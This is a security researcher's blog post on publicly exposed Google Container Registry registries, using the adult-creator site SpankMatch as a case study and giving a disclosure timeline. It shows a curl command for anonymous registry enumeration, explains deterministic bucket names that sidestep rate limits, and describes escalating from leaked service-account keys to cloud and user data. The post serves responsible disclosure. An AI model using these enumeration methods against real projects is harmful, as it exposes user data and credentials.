Since Google Container Registry’s deprecation announcement in May 2023, I’ve observed over 3,000 registries that allow anonymous access, with about 35% of them containing active secrets of some type. About a third of those were after GCR completely shutdown in 2025(!). I’ve sent reports, all very similar to the one below, to more than 100 companies. This included household-name retailers, two cell network providers, three airlines, “magic quadrant” SaaS companies, multiple crypto/defi projects, and even Google itself (dev projects, no customer data, to be clear). Just a wide gamut of “oh shit!” and almost every contact has said they had not intended to allow public access to their GCR registry.

One of the companies I tried to contact, pretty unsuccessfully it turned out, was SpankMatch; a networking and collaboration site for adult content creators started in 2022 by SpankChain and ultimately shuttered in 2025. From at least when I first attempted to report my findings to them in December 2023 and up until May 2025, when SpankMatch was “paused”, an exploitable combination of GCR misconfiguration, poor CI / Docker image build practices, and secret handling led to:

  • GCP roles/editor access to all cloud resources, including GKE clusters, GCS buckets, and SQL Cloud database instances
  • Access to all uploaded media and user records
  • Impersonation of any SpankMatch user

Even after SpankMatch shutdown in May 2025 and Google Container Registry shutdown in March 2025, the underlying GCR exposure remained. (More on that later in the On Layers & Long Tails section.) While most cloud resources were cleaned up, a final set of database backups remained and appeared to contain all user profile records up until the shutdown. This final, lingering access issue was fixed in late March 2026.

When a company chooses to build an application around the data of a vulnerable population then the privacy and security obligations to those users become paramount. It’s impossible for an average user to evaluate the security of an app and they have little to go on other than the developer’s public statements and responses. Compare my attempted disclosure timeline and quotes like this from when SpankMatch was “paused” in May 2025:

A rep elaborated on the safety of user data.

“All user records are safe and will be handled with the highest diligence as SpankChain focuses all of its efforts on helping create a world where such products can thrive,” the rep said. “SpankChain will continue to communicate with regulatory bodies, focusing on advocacy and education while continuing to support promising crypto and adult initiatives.”

I followed up from my initial contact multiple times through 2024, 2025, and 2026 without any response. If you were a SpankMatch user and have any questions about your data, I would suggest reading the privacy policy still linked on spankchain.com or reaching out to them via their contact page. Perhaps you’ll have better luck than I did.

This is a bit of a “twin tracks” post. First, I’m highlighting SpankMatch here as an illustration of the kind of CI and secret handling practices I commonly saw. The other goal is to point out that Google had opportunities (and imo, an obligation) to reach out to their customers about GCR misconfigurations, which would have included SpankMatch, and that GCP fumbled the shutdown of GCR in a manner that left a number of projects in an exposed state.

SpankMatch’s GCR Exposure and Escalation

SpankMatch’s issues are such a capsule example of the kind of problems I was reporting to other organizations that I think it’s useful to quickly walk through them. The initial exposure is from their the GCR registry being misconfigured and allowing for public/anonymous enumeration and image pulls (redacting their project-id):

$ curl -s https://gcr.io/v2/<snip>/tags/list | jq
{
  "child": [
    "spankmatch-api",
    "spankmatch-api-2",
    "spankmatch-api-2-staging",
    "spankmatch-api-dev",
    "spankmatch-ui",
    "spankmatch-ui-dev"
  ],
  "manifest": {},
  "name": "<snip>",
  "tags": []
}

Pulling and running any of these images, spankmatch-api in the snippet below, shows they’ve included the entire current working directory from their build pipeline in the resulting image:

$ ls -1a
.env
.eslintrc.js
.git
.github
.gitignore
.nvmrc
.prettierrc
.sample-env
.vscode
ci-config
db-scripts
docker
Dockerfile
kube
nest-cli.json
package-lock.json
package.json
README.md
spankmatch2-staging-service-account.json
src
test
tsconfig.build.json
tsconfig.json

Besides just the full source code of the API, the image contains the full git history (.git/), the runtime secrets of the API (.env), and an roles/editor-level GCP service account(spankmatch2-staging-service-account.json). While it initially looks like a Docker build context leak, a surprisingly common issue in (assumed to be) private images, this image built was in GCP CloudBuild and those manifests are also in the image, we can actually check for ourselves:

$ cat ci-config/cloudbuild-prod.yaml
steps:
  # Get .env config file
  - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
    args:
      - gsutil
      - cp
      - ${_CONFIG_FILE_URL}
      - .

  # Get Google Credentials for Service Account - Bucket
  - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
    args:
      - gsutil
      - cp
      - ${_STORAGE_CONFIG_FILE}
      - .

  # Build docker Image
  - name: gcr.io/cloud-builders/docker
    args:
      - build
      - -t
      - gcr.io/$_CUSTOM_PROJECT/$_CUSTOM_APP_NAME
      - .

  # Push docker Image to registry
  - name: gcr.io/cloud-builders/docker
    args:
      - push
      - gcr.io/$_CUSTOM_PROJECT/$_CUSTOM_APP_NAME

  ...

timeout: 1200s
substitutions:
  _CUSTOM_REGION: us-central1
  _CUSTOM_CLUSTER: spank-match-cluster
  _CUSTOM_APP_NAME: spankmatch-api-2
  _CUSTOM_PROJECT: <snip>

The CloudBuild process copies down the .env (_CONFIG_FILE_URL) and GCP SA json (_STORAGE_CONFIG_FILE) and then start a docker build .... So it turns out that the inclusion of the .env and GCP SA json was actually intentional, hence the image-per-environment image naming convention. Because of this CI and deployment pattern, a single exposed image contained everything needed to escalate directly into their GCP environment. I saw this kind of pattern in hundreds of registries, skipping all external secret management and runtime identity patterns by just baking that shit right in. It’s seemingly endemic to “dev” environments and assumed-private images. (Everyone knows that everybody’s CI sucks, just kicking the VERY dead horse some more.)

Since SpankMatch’s issues all started with a misconfigured GCR registry, let’s rewind back to when I first reached out to Google after I noticed the high rate of misconfig’ed GCR registries in the wild.

“The product team has currently not expressed interest in proactively reaching out to users.”

In May 2023, as part of the lead up to the talk I gave at DEF CON 31’s Cloud Village (Call Me Phishmael: Hunting Sensitive Docker Images in Google Container Registry Leaks), I submitted a Google VRP report pointing out that a number of factors combined to make the current state of GCR, well, pretty crappy:

  • The GCP Console UI provided a single button that controlled the private/public visibility or the entire registry with no user confirmation.
  • Registry names are based entirely on the GCP Project’s project-id. The project-id is defined by the project’s owner, used in a number of public places by other GCP services, and are relatively easy to discover/harvest.
  • Each GCR registry creates a GCS bucket that’s used to store layer blobs and the bucket names are also deterministic: registry gcr.io/<project-id> -> bucket artifacts.<project-id>.appspot.com. The access policies for these buckets mirror the visibility of the GCR registry, so gcr.io rate limits can be skipped by using the GCS API to look for the artifact buckets. (These buckets are also classic cloud “shadow resources”. They’re created by the GCR service but exist in user space and can be directly misconfigured or broken by the project owner.)
  • Other GCP services, Google App Engine (GAE) and Google Cloud Functions (GCF), are using GCR as scratch space and will do so regardless of registry’s public/private setting. That means when a GCR registry becomes public, so does any past or future GAE and GCF deployments.

To illustrate my point, I included a list of 200-odd projects that were currently leaking GAE or GCF images and had taken less than a day to find. Google identified the report as a “Abuse Risk” and we did a little back-and-forth about projects that had been accessed, has my talk been accepted, what the content of title of my talk would be, etc. (I didn’t consider this repot an exploit at all, but instead just kinda a heads up that GCR had become a soft spot and was ripe for abuse.) Eventually in July 2023 Google posted their final update:

Google Vulnerability Reward Program panel has decided to issue a reward of $X for your report. Congratulations! Rationale for this decision: Exploitation likelihood is low. Issue qualified as an abuse-related methodology with medium impact.

While we cannot determine which of these buckets were mistakenly misconfigured (as opposed to intentionally configured), this helped us improve product clarity for which we are issuing a reward.

More or less what I’d expected, but I thought the odds of registries “intentionally configured” to leak their own GAE and GCF images was pretty fuckin’ low. So I asked a follow-up question:

I can only characterize Google’s reply as “lol nope!”:

So this was basically the state of GCR up until the day before my talk at the DC Cloud Village. That’s when Google rolled out a change to completely remove the public/private switch from the UI and instead required users to directly change the permissions on the GCS artifact bucket itself.

Right here is the point where I believe Google absolutely failed the spirit of their own Shared Responsibility Model by not notifying project owners of public GCR registries. They seem to have realized that their initial design caused GCR users to accidentally put themselves into a dangerous position, but after addressing it they then failed to reach out the very same users.

But hey, at least GCR was getting replaced by Google Artifact Registry (GAR) and was slated for final shutdown in 2025. That means all those public registries would get closed, right? Right?

On Layers & Long Tails

During the GCR to Google Artifact Registry transition period, it was the project owner’s responsibility to transfer their images from GCR to GAR if they wanted to keep them or continue to use the gcr.io registry hostnames (they would get forwarded over to GAR). To that end, Google provided an “automatic migration tool”. One thing the tool didn’t do was cleanup the storage bucket that held layer blobs (<region>.artifacts.<project-id>.appspot.com), that was left up to the project owner:

When you are ready to stop using Container Registry, delete the remaining images by deleting the storage buckets for Container Registry.

When redirection is enabled, commands to delete images in gcr.io paths delete images in the corresponding Artifact Registry gcr.io repository, but they don’t delete images stored on Container Registry hosts.

To safely remove all Container Registry images, delete the Cloud Storage buckets for each Container Registry hostname.

What that means is that after the GCR shutdown, artifact buckets were orphaned and public buckets stayed public. A bucket the user didn’t create to back a managed service that no longer exists. This was position that SpankMatch ended up in, with everything supposed to be shutdown but the artifact bucket still public.

Even worse, during the transition and shutdown phase I saw hundreds of previously secure artifacts buckets become public and stay public. I assume this was due to project owners’ difficulties with the GAR migration process and fumbling the IAM permissions.

These layers are also basically useless to project owners. The corresponding image manifests were destroyed with the final shutdown of GCR so you wouldn’t be able to reconstruct the Docker images the layers initially belonged to. The orphaned buckets are just big piles of random filesystems containing god knows what.

I understand this ultimately may be a minor gripe (or just spitting into the ocean of larger security concerns). Maybe the GCP projects I found aren’t the tip of an iceberg, but only Google is in the position to actually know. Just send your customers an email, damn.

SpankMatch Disclosure Timeline

  • 12-01-2023 - Emailed [email protected], asking for an existing VRP or an appropriate security contact
  • 12-01-2023 - Response from [email protected] saying if I “report an issue from staging we will look into it, but we only pay bounties for bugs found on the production server”
  • 12-01-2023 - Sent original writeup, demonstrating SA key leak, production asset/resources access, production user spoofing via JWT forgery
  • 12-20-2023 - Emailed [email protected] for followup, no response
  • 02-24-2024 - Emailed help|[email protected] re-iterating original report and that initial registry leak is still open, no response
  • 08-30-2025 - Emailed help|support|private|[email protected] reporting that registry bucket is still open to the public and still leaking active credentials, no response
  • 03-10-2026 - Emailed help|support|private|[email protected] and three user emails @spankchain.com from DB backup with updated writeup, no response
  • 03-13-2026 - Reached out via Contact form @ https://www.spankchain.com/contact, no response
  • 03-14-2026 - Reached out via Bluesky, SpankChain replied @ “Ok great we’ll take a look and get back to you! “, never contacted me
  • 03-23-2026 - Reached out again via Bluesky @ https://bsky.app/profile/amenbreakpoint.com/post/3mhqkt4ed7s2n, no response
  • 04-02-2026 - Checked and issue fixed, probably sometime after 3/26